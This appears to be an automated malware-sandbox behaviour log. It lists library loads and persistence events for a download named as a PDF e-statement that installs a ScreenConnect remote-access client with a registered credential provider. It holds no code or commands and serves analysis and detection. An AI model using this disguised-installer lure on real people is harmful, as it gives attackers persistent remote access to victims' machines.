Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: wldp.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: amsi.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: userenv.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: profapi.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: version.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: propsys.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: edputil.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: netutils.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: slc.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: sppc.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msihnd.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: srclient.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: spp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: dpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: gpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: wtsapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: winsta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: netapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: samcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: samlib.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: rasman.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: rtutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Section loaded: windowscodecs.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sppc.dll
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

                      Persistence and Installation Behavior

Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dll | COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32 (reported 8 times)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\Unconfirmed 701254.crdownload
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.Cab.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI73FE.tmp (reported 2 times)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.InstallerActions.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.Windows.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp
